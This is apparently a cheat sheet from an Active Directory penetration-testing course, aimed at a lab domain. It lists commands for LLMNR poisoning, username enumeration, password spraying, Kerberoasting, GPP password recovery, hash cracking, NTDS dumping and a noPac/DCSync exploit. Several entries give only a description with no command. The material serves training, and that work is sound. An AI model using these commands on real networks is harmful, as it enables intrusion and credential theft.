Used to query the domain name system and discover the IP address to domain name mapping of the target entered from a Linux-based host.
sudo tcpdump -i ens224
Used to start capturing network packets on the network interface following the `-i` option from a Linux-based host.
sudo responder -I ens224 -A
Used to start responding to & analyzing `LLMNR`, `NBT-NS` and `MDNS` queries on the interface specified following the `-I` option, operating in `Passive Analysis` mode, which is activated using `-A`. Performed from a Linux-based host.
fping -asgq 172.16.5.0/23
Performs a ping sweep on the specified network segment from a Linux-based host.
sudo nmap -v -A -iL hosts.txt -oN /home/User/Documents/host-enum
Performs an nmap scan with OS detection, version detection, script scanning, and traceroute enabled (`-A`) against the list of hosts in the file (`hosts.txt`) specified following `-iL`, then writes the scan results to the file specified after the `-oN` option. Performed from a Linux-based host.
sudo git clone https://github.com/ropnop/kerbrute.git
Uses git to clone the kerbrute tool from a Linux-based host.
make help
Used to list compiling options that are possible with `make` from a Linux-based host.
sudo make all
Used to compile a `Kerbrute` binary for multiple OS platforms and CPU architectures.
./kerbrute_linux_amd64
Used to test the chosen compiled `Kerbrute` binary from a Linux-based host.
Runs the Kerbrute tool to discover usernames in the domain (`INLANEFREIGHT.LOCAL`) specified following the `-d` option and the associated domain controller specified following `--dc`, using a wordlist, and outputs (`-o`) the results to a specified file. Performed from a Linux-based host.
ACL Enumeration & Tactics
Find-InterestingDomainAcl
PowerView tool used to find object ACLs in the target Windows domain with modification rights set to non-built-in objects from a Windows-based host.
Used to find all Windows domain objects that the user has rights over by mapping the user's `SID` to the `SecurityIdentifier` property from a Windows-based host.
A `foreach` loop used to retrieve ACL information for each domain user in a target Windows domain by feeding each line of a text file (`ad_users.txt`) to the `Get-ADUser` cmdlet, then enumerating the access rights of those users. Performed from a Windows-based host.
PowerView tool used to add a specific user (`damundsen`) to a specific security group (`Help Desk Level 1`) in a target Windows domain from a Windows-based host.
PowerView tool used to view the members of a specific security group (`Help Desk Level 1`) and output only the username of each member (`Select MemberName`) of the group from a Windows-based host.
PowerView-based tool used to search for the `DONT_REQ_PREAUTH` value across user accounts in a target Windows domain. Performed from a Windows-based host.
Enumerates users in a target Windows domain and automatically retrieves the `AS-REP` for any users found that don't require Kerberos pre-authentication. Performed from a Linux-based host.
Authenticates with a Windows target over `smb` using valid credentials and attempts to discover more users (`--users`) in a target Windows domain. Performed from a Linux-based host.
Authenticates with a Windows target over `smb` using valid credentials and attempts to discover groups (`--groups`) in a target Windows domain. Performed from a Linux-based host.
Authenticates with a Windows target over `smb` using valid credentials and attempts to check for a list of logged on users (`--loggedon-users`) on the target Windows host. Performed from a Linux-based host.
Authenticates with a Windows target over `smb` using valid credentials and attempts to discover any smb shares (`--shares`). Performed from a Linux-based host.
Authenticates with a Windows target over `smb` using valid credentials and utilizes the CrackMapExec module (`-M`) `spider_plus` to go through each readable share (`Dev-share`) and list all readable files. The results are output in `JSON`. Performed from a Linux-based host.
Enumerates the target Windows domain using valid credentials and lists shares & permissions available on each within the context of the valid credentials used and the target Windows host (`-H`). Performed from a Linux-based host.
Enumerates the target Windows domain using valid credentials and performs a recursive listing (`-R`) of the specified share (`SYSVOL`) and only outputs a list of directories (`--dir-only`) in the share. Performed from a Linux-based host.
rpcclient $> queryuser 0x457
Enumerates a target user account in a Windows domain using its relative identifier (`0x457`). Performed from a Linux-based host.
rpcclient $> enumdomusers
Discovers user accounts in a target Windows domain and their associated relative identifiers (`rid`). Performed from a Linux-based host.
Impacket tool used to connect to the `CLI` of a Windows target via the `ADMIN$` administrative share with valid credentials. Performed from a Linux-based host.
Executes the python implementation of BloodHound (`bloodhound.py`) with valid credentials and specifies a name server (`-ns`) and target Windows domain (`inlanefreight.local`) as well as runs all checks (`-c all`). Runs using valid credentials. Performed from a Linux-based host.
Used to create a variable called SID that is set equal to the SID of a user account. Then uses PowerView tool `Get-ObjectAcl` to check a specific user's replication rights. Performed from a Windows-based host.
Impacket tool used to extract NTLM hashes from the NTDS.dit file hosted on a target Domain Controller (`172.16.5.5`) and save the extracted hashes to a file (`inlanefreight_hashes`). Performed from a Linux-based host.
PowerShell cmd-let used to view `AppLocker` policies from a Windows-based host.
$ExecutionContext.SessionState.LanguageMode
PowerShell script used to discover the `PowerShell Language Mode` being used on a Windows-based host. Performed from a Windows-based host.
Find-LAPSDelegatedGroups
A `LAPSToolkit` function that discovers `LAPS Delegated Groups` from a Windows-based host.
Find-AdmPwdExtendedRights
A `LAPSToolkit` function that checks the rights on each computer with LAPS enabled for any groups with read access and users with `All Extended Rights`. Performed from a Windows-based host.
Get-LAPSComputers
A `LAPSToolkit` function that searches for computers that have LAPS enabled, discovers password expiration, and can discover randomized passwords. Performed from a Windows-based host.
Tool used to decrypt a captured `group policy preference password` from a Linux-based host.
crackmapexec smb -L | grep gpp
Locates and retrieves a `group policy preference password` using `CrackMapExec`, then filters the output using `grep`. Performed from a Linux-based host.
Locates and retrieves any credentials stored in the `SYSVOL` share of a Windows target using `CrackMapExec` from a Linux-based host.
Get-DomainGPO | select displayname
PowerView tool used to enumerate GPO names in a target Windows domain from a Windows-based host.
Get-GPO -All | Select DisplayName
PowerShell cmd-let used to enumerate GPO names. Performed from a Windows-based host.
$sid=Convert-NameToSid "Domain Users"
Creates a variable called `$sid` that is set to the output of the `Convert-NameToSid` tool for the group account `Domain Users`. Performed from a Windows-based host.
PowerView tool that is used to check if the `Domain Users` (`eq $sid`) group has any rights over one or more GPOs. Performed from a Windows-based host.
PowerShell cmd-let used to enumerate user accounts on a target Windows domain and filter by `ServicePrincipalName`. Performed from a Windows-based host.
Get-ADTrust -Filter *
PowerShell cmd-let used to enumerate any trust relationships in a target Windows domain and filters by any (`-Filter *`). Performed from a Windows-based host.
Get-ADGroup -Filter * | select name
PowerShell cmd-let used to enumerate groups in a target Windows domain and filters by the name of the group (`select name`). Performed from a Windows-based host.
Get-ADGroup -Identity "Backup Operators"
PowerShell cmd-let used to search for a specific group (`-Identity "Backup Operators"`). Performed from a Windows-based host.
Get-ADGroupMember -Identity "Backup Operators"
PowerShell cmd-let used to discover the members of a specific group (`-Identity "Backup Operators"`). Performed from a Windows-based host.
Export-PowerViewCSV
PowerView script used to append results to a `CSV` file. Performed from a Windows-based host.
ConvertTo-SID
PowerView script used to convert a `User` or `Group` name to its `SID`. Performed from a Windows-based host.
Get-DomainSPNTicket
PowerView script used to request the kerberos ticket for a specified service principal name (`SPN`). Performed from a Windows-based host.
Get-Domain
PowerView script used to return the AD object for the current (or specified) domain. Performed from a Windows-based host.
Get-DomainController
PowerView script used to return a list of the target domain controllers for the specified target domain. Performed from a Windows-based host.
Get-DomainUser
PowerView script used to return all users or specific user objects in AD. Performed from a Windows-based host.
Get-DomainComputer
PowerView script used to return all computers or specific computer objects in AD. Performed from a Windows-based host.
Get-DomainGroup
PowerView script used to return all groups or specific group objects in AD. Performed from a Windows-based host.
Get-DomainOU
PowerView script used to search for all or specific OU objects in AD. Performed from a Windows-based host.
Find-InterestingDomainAcl
PowerView script used to find object `ACLs` in the domain with modification rights set to non-built-in objects. Performed from a Windows-based host.
Get-DomainGroupMember
PowerView script used to return the members of a specific domain group. Performed from a Windows-based host.
Get-DomainFileServer
PowerView script used to return a list of servers likely functioning as file servers. Performed from a Windows-based host.
Get-DomainDFSShare
PowerView script used to return a list of all distributed file systems for the current (or specified) domain. Performed from a Windows-based host.
Get-DomainGPO
PowerView script used to return all GPOs or specific GPO objects in AD. Performed from a Windows-based host.
Get-DomainPolicy
PowerView script used to return the default domain policy or the domain controller policy for the current domain. Performed from a Windows-based host.
Get-NetLocalGroup
PowerView script used to enumerate local groups on a local or remote machine. Performed from a Windows-based host.
Get-NetLocalGroupMember
PowerView script used to enumerate members of a specific local group. Performed from a Windows-based host.
Get-NetShare
PowerView script used to return a list of open shares on a local (or a remote) machine. Performed from a Windows-based host.
Get-NetSession
PowerView script used to return session information for the local (or a remote) machine. Performed from a Windows-based host.
Test-AdminAccess
PowerView script used to test if the current user has administrative access to the local (or a remote) machine. Performed from a Windows-based host.
Find-DomainUserLocation
PowerView script used to find machines where specific users are logged into. Performed from a Windows-based host.
Find-DomainShare
PowerView script used to find reachable shares on domain machines. Performed from a Windows-based host.
Find-InterestingDomainShareFile
PowerView script that searches for files matching specific criteria on readable shares in the domain. Performed from a Windows-based host.
Find-LocalAdminAccess
PowerView script used to find machines on the local domain where the current user has local administrator access. Performed from a Windows-based host.
Get-DomainTrust
PowerView script that returns domain trusts for the current domain or a specified domain. Performed from a Windows-based host.
Get-ForestTrust
PowerView script that returns all forest trusts for the current forest or a specified forest. Performed from a Windows-based host.
Get-DomainForeignUser
PowerView script that enumerates users who are in groups outside of the user's domain. Performed from a Windows-based host.
Get-DomainForeignGroupMember
PowerView script that enumerates groups with users outside of the group's domain and returns each foreign member. Performed from a Windows-based host.
Get-DomainTrustMapping
PowerView script that enumerates all trusts for current domain and any others seen. Performed from a Windows-based host.
PowerView script used to list all the members of a target group (`"Domain Admins"`) through the use of the recurse option (`-Recurse`). Performed from a Windows-based host.
PowerView script used to find users on the target Windows domain that have the `Service Principal Name` set. Performed from a Windows-based host.
.\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data
Runs a tool called `Snaffler` against a target Windows domain that finds various kinds of data in shares that the compromised account has access to. Performed from a Windows-based host.
Kerberoasting
sudo python3 -m pip install .
Used to install Impacket from inside the directory that gets cloned to the attack host. Performed from a Linux-based host.
GetUserSPNs.py -h
Impacket tool used to display the options and functionality of `GetUserSPNs.py` from a Linux-based host.
Impacket tool used to download/request a TGS ticket for a specific user account and write the ticket to a file (`-outputfile sqldev_tgs`). Performed from a Linux-based host.
Used to request/download TGS tickets for accounts with the `adminCount` attribute set to `1`, then formats the output in an easy to view & crack manner (`/nowrap`). Performed from a Windows-based host.
.\Rubeus.exe kerberoast /user:testspn /nowrap
Used to request/download a TGS ticket for a specific user (`/user:testspn`), then formats the output in an easy to view & crack manner (`/nowrap`). Performed from a Windows-based host.
PowerView tool used to check the `msDS-SupportedEncryptionType` attribute associated with a specific user account (`testspn`). Performed from a Windows-based host.
Uses `hashcat` to crack `NTLMv2` (`-m`) hashes that were captured by Responder and saved in a file (`frond_ntlmv2`). The cracking is done based on a specified wordlist. Performed from a Linux-based host.
Import-Module .\Inveigh.ps1
Using the `Import-Module` PowerShell cmd-let to import the Windows-based tool `Inveigh.ps1`.
(Get-Command Invoke-Inveigh).Parameters
Used to output many of the options & functionality available with `Invoke-Inveigh`. Performed from a Windows-based host.
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
Starts `Inveigh` on a Windows-based host with LLMNR & NBNS spoofing enabled and outputs the results to a file.
.\Inveigh.exe
Starts the `C#` implementation of `Inveigh` from a Windows-based host.
Uses `CrackMapExec` and valid credentials (`avazquez:Password123`) to enumerate the password policy (`--pass-pol`) from a Linux-based host.
rpcclient -U "" -N 172.16.5.5
Uses `rpcclient` to discover information about the domain through `SMB NULL` sessions. Performed from a Linux-based host.
rpcclient $> querydominfo
Uses `rpcclient` to enumerate the password policy in a target Windows domain from a Linux-based host.
enum4linux -P 172.16.5.5
Uses `enum4linux` to enumerate the password policy (`-P`) in a target Windows domain from a Linux-based host.
enum4linux-ng -P 172.16.5.5 -oA ilfreight
Uses `enum4linux-ng` to enumerate the password policy (`-P`) in a target Windows domain from a Linux-based host, then saves the output in YAML & JSON to the file name following the `-oA` option.
Uses `enum4linux` to discover user accounts in a target Windows domain, then leverages `grep` to filter the output to display just the users, from a Linux-based host.
Uses `ldapsearch` to discover users in a target Windows domain, then filters the output using `grep` to show only the `sAMAccountName`, from a Linux-based host.
./windapsearch.py --dc-ip 172.16.5.5 -u "" -U
Uses the python tool `windapsearch.py` to discover users in a target Windows domain from a Linux-based host.
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
Bash one-liner used to perform a password spraying attack using `rpcclient` and a list of users (`valid_users.txt`) from a Linux-based host. It also filters out failed attempts to make the output cleaner.
Uses `CrackMapExec` and a list of users (`valid_users.txt`) to perform a password spraying attack against a target Windows domain from a Linux-based host. It also filters out logon failures using `grep`.
Uses `CrackMapExec` and the `--local-auth` flag to ensure only one login attempt is performed from a Linux-based host. This is to ensure accounts are not locked out by enforced password policies. It also filters out logon failures using `grep`.
Import-Module .\DomainPasswordSpray.ps1
Used to import the PowerShell-based tool `DomainPasswordSpray.ps1` from a Windows-based host.
PowerView-based tool used to enumerate the `Remote Desktop Users` group on a Windows target (`-ComputerName ACADEMY-EA-MS01`) from a Windows-based host.
PowerView-based tool used to enumerate the `Remote Management Users` group on a Windows target (`-ComputerName ACADEMY-EA-MS01`) from a Windows-based host.
Uses the PowerShell cmd-let `Enter-PSSession` to establish a PowerShell session with a target over the network (`-ComputerName ACADEMY-EA-DB01`) from a Windows-based host. Authenticates using the credentials created in the two commands shown prior (`$cred` & `$password`).
evil-winrm -i 10.129.201.234 -u forend
Used to establish a PowerShell session with a Windows target from a Linux-based host using `WinRM`.
Import-Module .\PowerUpSQL.ps1
Used to import the PowerUpSQL tool.
Get-SQLInstanceDomain
PowerUpSQL tool used to enumerate SQL server instances from a Windows-based host.
Used to exploit the `noPac`/`Sam_The_Admin` vulnerability and perform a `DCSync` attack against the built-in Administrator account on a Domain Controller from a Linux-based host.
Transferring Files
sudo python3 -m http.server 8001
Starts a python web server for quick hosting of files. Performed from a Linux-based host.